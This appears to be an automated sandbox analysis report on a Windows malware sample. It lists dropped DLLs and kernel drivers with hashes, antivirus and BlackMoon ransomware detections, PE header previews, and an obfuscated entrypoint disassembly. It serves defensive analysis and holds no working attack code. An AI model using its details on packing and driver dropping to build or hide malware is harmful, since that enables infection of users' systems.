                                                                                SHA-512:10D8184D7FB0AEF004BAAE62FCB578F892A54400E69F34D3A590A16F8A55AC74713E6604E1E77F34324E38CB7CDE5D0E37DB9255087CF8343AD76378FD1E605A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 35%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ej.^............X(.......E......n}..!...n}%.U....s..........w....s......n}$.....n}!.(...n}......n}......Rich............................PE..L...@s.a.....................:......]'............@......................................@..................................Y..T........'.......................... ...............................h...@...............t............................text.............................. ..`.rdata..4...........................@..@.data....i...P...(...4..............@....vmp0....>.......@...\..............`....vmp1...d...........................`....reloc..............................@..@.rsrc....'.......(..................@..@................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1000448
                                                                                Entropy (8bit):7.9409094811899585
                                                                                Encrypted:false
                                                                                SSDEEP:24576:SM6k83srWbVyeQiMHi9PF00kmBDbH226JMVC:BN83sibUlpe0YBDqbJs
                                                                                MD5:E152321EF090F20A1D89D55B934A6B33
                                                                                SHA1:5ACE6F7EE05C65F024164168BFB9A0B4768E7D28
                                                                                SHA-256:92194C77114E6D4066EC1788485C2AF7E58C06E5906775F23CB22BABA33E1277
                                                                                SHA-512:A673E84D677D1B86B40A32FA5D67D9DE2575D0FEB4021159C11E3F003EC313D7C420213CCC2EF7833402077FF8C831147DF907B19C4F25E87EF4869CB7E93E56
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+RFeE.FeE.FeE..+..EeE.)....eE.)... eE.)....eE.O...OeE.FeD..eE.FeE.GeE.)....eE.)...GeE.RichFeE.........................PE..L......a...........!.........&............................................... '...........@...................................................................'.......'.............................p.'.@............`#.D............................text.............................. ..`.rdata...?..........................@..@.data...<2..........................@....vmp0....~...P......................`....vmp1....<.......>..................`....reloc........'......B..............@..B........................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):278528
                                                                                Entropy (8bit):6.462799085037293
                                                                                Encrypted:false
                                                                                SSDEEP:6144:qy8Rmc6sJdYFZY4yRc7979wypicS7UItAvl:clsYfu79pwypi949
                                                                                MD5:11D29986E22E3033FAD22362D5BB9B9E
                                                                                SHA1:2CE91BCAE7EA963FFDA9A797D4405AB87F2C77CD
                                                                                SHA-256:0D518D5120378DE44E8157A8F83F8AAF5BEB71A45BBF73C913F71E4BC9DCCEEB
                                                                                SHA-512:70D6C30DCB3F52E45F2C5E4859BD1238CB17DB56616E8A6A75942C92300365DE271D9FDE54F14822E0287D8A547E4523B42BB2F648491EB9C83ACFA2F734AAE8
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e....................3........3......3..........%.......3....3....3....3....Rich............PE..L...!r.T...........!.........H...............0............................................@.........................P................0..0....................P...,..................................py..@............0...............................text............................... ..`.rdata.......0......................@..@.data....E.......$..................@....rsrc...0....0......................@..@.reloc..NB...P...D..................@..B................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):5095424
                                                                                Entropy (8bit):6.573640794066719
                                                                                Encrypted:false
                                                                                SSDEEP:98304:8/Gq9tQ0I2sfjn+1LOfPR6F2+5bT7j5R31:e9t9I2vLOfPot
                                                                                MD5:AAA5DC054C587BCB8101660A9C08F0EC
                                                                                SHA1:1AAEA461D0B7DF8287B9269F945573F7BBD773A5
                                                                                SHA-256:3E0E15C5C5D2B5868B768E1AB71EAE9A2900B2341CF589272D571A0E3817A4E2
                                                                                SHA-512:FF02058DDE5A09E2DCE1FA9B5E8EBEC29809ACABA29A1D87623CAA40713C95B9AEE2A73F97632152F4D80FA270E5DE30BCA8A263A31A762B0339795139AAE964
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, Author: Joe Security
                                                                                • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2-x.vL..vL..vL...S..tL...P..wL..CI.qL...P..XL..@j..L..S..pL../o..tL..CK.UL..vL..N..@j..L..vL..wL..S..xL..J..wL..S..wL..RichvL..................PE..L...eb.]...........!.....0?..........O<......@?..............................0P......................................*@.M...8.?.|.... P......................@N.|....................................................@?..............................text...J'?......0?................. ..`.rdata..]....@?......@?.............@..@.data........0@......0@.............@....vmp0........ K.. ....H.............`..`.reloc..|....@N.......K.............@..@.rsrc........ P.......M.............@...........................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\FACCB296\21AAtnoki.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):13312
                                                                                Entropy (8bit):5.397635444561731
                                                                                Encrypted:false
                                                                                SSDEEP:192:/o5r2+6acxUj33TwlsXsDonjrWgncCMxOR3XkEqbp9K6ydDrjf9:A5Otx8HTweXssvWtxOt0L71yRrZ
                                                                                MD5:6D4F24374636A1D2B18D23508E94A5AF
                                                                                SHA1:6056E57026F5106BE7448650A711088F7F26B81B
                                                                                SHA-256:1001BED009D07EFADF0A1784CB07E79A362EAA4CDE62C43E8EC226B210E1388E
                                                                                SHA-512:3013651D862D731746A238AB729023506E65C7A8DE2E9967482B7356923296581C7F004B604D560DECB0B5FD32FAB3087DF7C4528C3EE1C6BC75C4E3A7D621FD
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n..T...T...T...s..P....@..U...J]..U...J]..Z...J]..]...J]..Q...T...>...J]..V...J]..U...J]..U...J]..U...RichT...........................PE..L....8.\...........!................"........0...............................p............@......................... =..5...<8..P....P..,....................`..t....1...............................3..@............0...............................text............................... ..`.rdata..U....0......................@..@.data........@.......$..............@....rsrc...,....P.......&..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2482176
                                                                                Entropy (8bit):7.655801729535385
                                                                                Encrypted:false
                                                                                SSDEEP:49152:vdt5TgZvBnBS7YWtu4uEiWaitbURcdltQ+LPfzgPKJdqL0B2eYL7YuPqpu0RKnX7:X5TgZvBnBS7YWtu4uEiWaitbURcdltQZ
                                                                                MD5:ED77B38E6DEACCC15EE7A3CDE313BF37
                                                                                SHA1:F9D6E7CA545790F385F35069230C153E38D84FF1
                                                                                SHA-256:2A7469FE77A4659592FE7E2C36D32343B3C8E728BB52EAEDA0CAE03BC74EAAB5
                                                                                SHA-512:594CA225AF6AB65688A2D891198B34D426B55F7B6CF55D366408D42DCC97B0E3A682D033F382CCE165D5DDE18381B88040F73BDC3D0C314E0C4D12AE32A09601
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, Author: Joe Security
                                                                                • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8...8...8...W...1...W...>...C...;.......0.............:..............:...........8.............8...9.......".......9...Rich8...........PE..L....o]...........!.........P......a..............E..........................(......................................A..K....$..,.............................(.D[......................................................T............................text...^........................... ..`.rdata..Ka.......p..................@..@.data........P.......P..............@....vmp0...13...P...@...@..............`..`.reloc..D[....(..`....%.............@..B........................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):200704
                                                                                Entropy (8bit):7.840036180451055
                                                                                Encrypted:false
                                                                                SSDEEP:3072:DtWru7tGhV0AD1Lciipl4gseTwdDV5PEv4gtJDxbs29mHzsKl5eUMfSrxrO:0ru7tGcJLqgseTMV9ivFsZ2XSM
                                                                                MD5:A366501F2CE6ABA81384C2688AF599C1
                                                                                SHA1:2A3A109CCFFCE9F1245B328E521120AC2FBFF66B
                                                                                SHA-256:233D8F1CB06995B505F4CECBAFE0DD53635BF820002C512639DD5A0B87827086
                                                                                SHA-512:4FA0E0BB6396ED2D8DB837EE010CD647DE4799AE9C111DB056EB7E0DC02D0D3BE936BDCD8342923DE359415890D9602BA0DEC20ED1111D68BAC5D38C2DDDB142
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................D.............=......<................9..........Rich...........PE..L......`...........!.........:...........................................................@.................................h1..d............................p......,f...............................e..@...............4............................text...v........................... ..`.rdata...K..........................@..@.data...H...........................@....vmp0....j..........................`....vmp1........`......................`....reloc.......p......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):614400
                                                                                Entropy (8bit):7.9216008760747325
                                                                                Encrypted:false
                                                                                SSDEEP:12288:v39HfzCgZ1UpcBLioopeCTKtYF3ECT9IhYWaTy94yVOvV3m3:vtLCcUpQmomea9F3B+XY2Ohm3
                                                                                MD5:1CD5B851B0AC196F36DF69B82DDD475E
                                                                                SHA1:A8831A73E9FB0FE78B110681F13300A56898680A
                                                                                SHA-256:23A842D3EE1B7724999BE5C8676BE999294D63B9BB94492E6BB4C0FB1A0D1402
                                                                                SHA-512:650053FFF05DF29976AF65347A5C9850B52186E0847BA2A7A05E3662E5CD607BDA5CA8B7290FFC56F6B786FE337FD8C48CCA8B953482C0C54AED5C1C041EC690
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 78%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n...n...n...q..n...q..n...r..n...a...n..Xr...n..Xf...n...H.bn..3q..n...H...n...n..Bl...a...n...H.an...n...n..3q..n..3q...n..Rich.n..........PE..L.....\...........!.........`......^........................................0!........................................d.................................... !....................................................... ..............................text....|.......................... ..`.rdata..............................@..@.data...q.... ......................@....vmp0...Y...........................`..`.vmp1....4.......@..................`....reloc....... !......P..............@..B........................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):614400
                                                                                Entropy (8bit):7.9216008760747325
                                                                                Encrypted:false
                                                                                SSDEEP:12288:v39HfzCgZ1UpcBLioopeCTKtYF3ECT9IhYWaTy94yVOvV3m3:vtLCcUpQmomea9F3B+XY2Ohm3
                                                                                MD5:1CD5B851B0AC196F36DF69B82DDD475E
                                                                                SHA1:A8831A73E9FB0FE78B110681F13300A56898680A
                                                                                SHA-256:23A842D3EE1B7724999BE5C8676BE999294D63B9BB94492E6BB4C0FB1A0D1402
                                                                                SHA-512:650053FFF05DF29976AF65347A5C9850B52186E0847BA2A7A05E3662E5CD607BDA5CA8B7290FFC56F6B786FE337FD8C48CCA8B953482C0C54AED5C1C041EC690
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 78%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n...n...n...q..n...q..n...r..n...a...n..Xr...n..Xf...n...H.bn..3q..n...H...n...n..Bl...a...n...H.an...n...n..3q..n..3q...n..Rich.n..........PE..L.....\...........!.........`......^........................................0!........................................d.................................... !....................................................... ..............................text....|.......................... ..`.rdata..............................@..@.data...q.... ......................@....vmp0...Y...........................`..`.vmp1....4.......@..................`....reloc....... !......P..............@..B........................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):21878788
                                                                                Entropy (8bit):7.814225492140437
                                                                                Encrypted:false
                                                                                SSDEEP:393216:+wnLwvEgWtakXdhPLEB5n9GQEFVD/Tsfhs13M9SNGDYhBUSg7dID1bMW:9nLtgWtakXzoBiRFVfuhq3MAGABNgmD1
                                                                                MD5:E5CBF953F666310019C8BA0C1FAB39F9
                                                                                SHA1:324547FD42CFB4C2AC6188F95ADD58844B247AF2
                                                                                SHA-256:63A2CA58A38B2CE43DCA6FE4DC612293AA5C21E1F32E8EBC00316CA35BD8B5F3
                                                                                SHA-512:0FA1A75BF042933AE92E0041B8922D18C53B3CA7DBE06D211B18F2AA5717EAA873236D9D6A49D8EC17C07D2E307874C7BBD00063BCDF69BD70FFC758A242D61D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a...%..I%..I%..I,.eI$..I..wI!..I,.bI5..I,.rI...I%..I ..I;.tI...I;.eI...I;.bI...I;.uI$..I%.vI$..I;.pI$..IRich%..I........PE..L......b.................H..................`....@..........................0......AqN...@.................................L=z..........E.....................\...................................|..@............p{.........@....................text....F.......................... ..`.rdata..>....`......................@..@.data........0......................@....data30..i*.........................`....data31.T.M..@5...M.................`....reloc..\............M.............@..@.rsrc....E.......F....M.............@..@................................................................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.lnk

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Oct 4 13:16:54 2023, mtime=Thu Dec 5 12:25:03 2024, atime=Thu Dec 5 12:25:00 2024, length=21878788, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):660
                                                                                Entropy (8bit):5.179781727751646
                                                                                Encrypted:false
                                                                                SSDEEP:12:8mBqieE1qzYNbRxKY5sM43Vk83wjEjAgcxZqVk83dFloLF60mV:8mBqizTnDsM43V/0QATxZqV/wF60m
                                                                                MD5:0B2A717BADF6E238D96DCE195D54B763
                                                                                SHA1:CB920B5585CCAD137898B77064E7414CB9A0DD79
                                                                                SHA-256:BFBDD59F8B1523FBAD65BE392928BA95E7ED59E769E7670B19C5BEF18E2A62B5
                                                                                SHA-512:CC6316872CC3796F0A4E93A795FB9831E1060D37F777812DA3C6AB88337361904A206C6D87F8E071D6FB94987FF5B418DF1F0AED0DC65B9E8739BA53305016F8
                                                                                Malicious:false
                                                                                Preview:L..................F.... ...Kn.m.........G...1...G....M..........................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........n....z...G......2...M..Y!k .VIP-#U~1.EXE..f......DW.r.Y!k..............................V.I.P.-.#.U.4.f.1.a.#.U.5.4.5.8.#.U.7.2.4.8...e.x.e.......a...............-.......`..............&.....C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe......\.V.I.P.-.#.U.4.f.1.a.#.U.5.4.5.8.#.U.7.2.4.8...e.x.e...C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.`.......X.......888683...........hT..CrF.f4... .B{2=.b...,...W..hT..CrF.f4... .B{2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                C:\Windows\D74384F.sys

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):1015208
                                                                                Entropy (8bit):7.855565323381043
                                                                                Encrypted:false
                                                                                SSDEEP:24576:JwtaXBvd9waAo9UfHlbDOkVmE7iTp3EusBBQQnlbi55BhvK:Jwyhd9waAo9eFbDlVmke3EHRanv
                                                                                MD5:386967A0501E0E7DB0A3B52B7722BBE8
                                                                                SHA1:7AFF6DDE81A95994285176AA1DD50A89851B401D
                                                                                SHA-256:D390B07F5BCD247499CCB99B5D874BE74442185CB571DFF47F375836F460B16F
                                                                                SHA-512:79807C178E8D1B67A9A62B29C8E51FEB0548A1B775360F929803210379CC128EB872CF6B4580ABB3FCB299979039693F974FC7359CC8BC900058FF47ADC97300
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D%..%K.%K.%K.%J.'%K.]..%K.]..%K.]..%K.M..%K.M..%K.%...%K.%...%K.%...%K.Rich.%K.........PE..d...V..`..........".................$t ........@.............................0!.....y.....`.................................................p]..P....................l....... !.p.....!...............................!..............@..h............................text...D........................... ..h.rdata...9..........................@..H.data...@v...P......................@....pdata..............................@..HINIT................................ ..`.spa0...{...........................`..h.spa1....d.......f..................`....reloc..p.... !......j..............@..B........................................................................................................................................................................................

                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                C:\Windows\SysWOW64\22FD558C8.sys

                                                                                Download File
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1015208
                                                                                Entropy (8bit):7.855565323381043
                                                                                Encrypted:false
                                                                                SSDEEP:24576:JwtaXBvd9waAo9UfHlbDOkVmE7iTp3EusBBQQnlbi55BhvK:Jwyhd9waAo9eFbDlVmke3EHRanv
                                                                                MD5:386967A0501E0E7DB0A3B52B7722BBE8
                                                                                SHA1:7AFF6DDE81A95994285176AA1DD50A89851B401D
                                                                                SHA-256:D390B07F5BCD247499CCB99B5D874BE74442185CB571DFF47F375836F460B16F
                                                                                SHA-512:79807C178E8D1B67A9A62B29C8E51FEB0548A1B775360F929803210379CC128EB872CF6B4580ABB3FCB299979039693F974FC7359CC8BC900058FF47ADC97300
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D%..%K.%K.%K.%J.'%K.]..%K.]..%K.]..%K.M..%K.M..%K.%...%K.%...%K.%...%K.Rich.%K.........PE..d...V..`..........".................$t ........@.............................0!.....y.....`.................................................p]..P....................l....... !.p.....!...............................!..............@..h............................text...D........................... ..h.rdata...9..........................@..H.data...@v...P......................@....pdata..............................@..HINIT................................ ..`.spa0...{...........................`..h.spa1....d.......f..................`....reloc..p.... !......j..............@..B........................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.814225458015662
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:VIP-#U4f1a#U5458#U7248.exe
                                                                                File size:21'878'788 bytes
                                                                                MD5:79e8c7fc08846104c300079e8f9cfff2
                                                                                SHA1:b9d9e952375e973d71a077973f6be03f6b9a1987
                                                                                SHA256:0a1dc880d7c52be7311f2870481796bba315774f7c646876f88dc84837f3b4c0
                                                                                SHA512:92f6c950c221ec43bbdf1f22cba95df1b55079c1a24d9623919f565f8ed82adf11eb54f0de8e9ffc718946893faeb5a9836ee9b7cda7df2b0eac854f21c06467
                                                                                SSDEEP:393216:+wnLwvEgWtakXdhPLEB5n9GQEFVD/Tsfhs13M9SNGDYhBUSg7dID1bM+:9nLtgWtakXzoBiRFVfuhq3MAGABNgmDN
                                                                                TLSH:4A2733E82EEC0373E717C13E8178729293189D5B98A9959BD8D8B4FEC0366257635C0F
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a...%..I%..I%..I,.eI$..I..wI!..I,.bI5..I,.rI...I%..I ..I;.tI...I;.eI...I;.bI...I;.uI$..I%.vI$..I;.pI$..IRich%..I........PE..L..

                                                                                File Icon

                                                                                Icon Hash:00728a0a4a8ad920

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x2c0e3e8
                                                                                Entrypoint Section:.data31
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6201FC16 [Tue Feb 8 05:13:58 2022 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:76e0e080a1784daaf00fd068f03ca48e

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                call 00007F04390F5283h
                                                                                and dword ptr [92999044h], ebp
                                                                                shl dword ptr [edi-6Eh], 1
                                                                                push ss
                                                                                push eax
                                                                                das
                                                                                and byte ptr [ebx-0FEC7492h], ch
                                                                                insd
                                                                                xchg eax, esi
                                                                                jnp 00007F04390DEF66h
                                                                                in eax, dx
                                                                                salc
                                                                                jmp 00007F04390DEF98h
                                                                                loop 00007F04390DEFF3h
                                                                                fadd qword ptr [B85F8EE9h]
                                                                                dec esi
                                                                                je 00007F04390DEF4Dh
                                                                                mov al, byte ptr [eax]
                                                                                push 0000001Fh
                                                                                fisubr dword ptr [eax-79h]
                                                                                rcl byte ptr [ebp+30h], 1
                                                                                adc byte ptr [ecx+289A2188h], FFFFFFD5h
                                                                                aam 2Bh
                                                                                hlt
                                                                                push ecx
                                                                                sbb ebx, esi
                                                                                dec ebp
                                                                                int1
                                                                                inc eax
                                                                                mov edx, 8EF79F60h
                                                                                cwde
                                                                                cmpsd
                                                                                sbb al, 19h
                                                                                pop esp
                                                                                out dx, al
                                                                                adc esi, dword ptr [edi-139C0203h]
                                                                                out dx, eax
                                                                                lodsb
                                                                                mov byte ptr [esi], dl
                                                                                jno 00007F04390DEFD2h
                                                                                mov dword ptr [15B35DD6h], eax
                                                                                stosd
                                                                                cmp dh, al
                                                                                sub eax, 1008256Eh
                                                                                outsb
                                                                                sti
                                                                                pop es
                                                                                jo 00007F04390DEFECh
                                                                                xchg eax, ebp
                                                                                xchg eax, esp
                                                                                xor esp, dword ptr [esi+21h]
                                                                                imul dword ptr [edi+ebp*4-1Ch]
                                                                                shl dword ptr [ebx+25D01A46h], 15h
                                                                                sub dl, dl
                                                                                mov esp, E576F7A3h
                                                                                jnp 00007F04390DEFDBh
                                                                                mov ch, 3Ah
                                                                                rcl dword ptr [ecx], 0Bh
                                                                                cmp al, CCh
                                                                                fisttp word ptr [eax]
                                                                                sbb eax, A2EF6414h
                                                                                mov ds, ax
                                                                                mov cl, AAh
                                                                                xchg dword ptr [edx-32h], esi
                                                                                inc ebx
                                                                                sbb byte ptr [edi+2935693Ah], ch
                                                                                xchg eax, ebx
                                                                                pop ds
                                                                                js 00007F04390DEFC9h
                                                                                std
                                                                                jc 00007F04390DEF42h
                                                                                scasd
                                                                                pop edx
                                                                                sar al, 1
                                                                                or dword ptr [edx], ebx
                                                                                das
                                                                                sbb cl, cl
                                                                                dec esi
                                                                                jnc 00007F04390DEFDAh
                                                                                mov ecx, 58B34596h
                                                                                pop edx
                                                                                inc ecx
                                                                                push edi
                                                                                loop 00007F04390DF001h

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [C++] VS2008 SP1 build 30729
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [ASM] VS2008 build 21022
                                                                                • [C++] VS2008 build 21022
                                                                                • [ C ] VS2008 build 21022
                                                                                • [RES] VS2008 build 21022
                                                                                • [LNK] VS2008 build 21022

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x27a3d4c0x190.data31
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x282e0000x4592.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x282d0000x5c.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x282c77c0x40.data31
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x27b70000xb0.data31
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x9f2940x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x846f80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
